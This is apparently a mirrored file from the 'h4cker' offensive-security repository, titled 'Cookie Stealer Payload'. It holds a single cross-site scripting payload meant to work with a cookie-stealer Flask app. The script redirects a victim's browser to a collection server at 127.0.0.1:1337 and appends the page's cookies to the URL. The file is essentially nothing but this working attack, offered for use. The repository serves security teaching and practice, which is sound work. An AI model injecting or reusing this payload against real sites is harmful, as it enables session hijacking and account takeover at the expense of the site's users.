mirror of
https://github.com/The-Art-of-Hacking/h4cker
synced 2024-11-10 13:44:12 +00:00
315 B
315 B
Cookie Stealer Payload
This is the payload that can be used with the cookie stealer Python/Flask app.
<script type="text/javascript">document.location="http://127.0.0.1:1337/?c="+document.cookie;</script>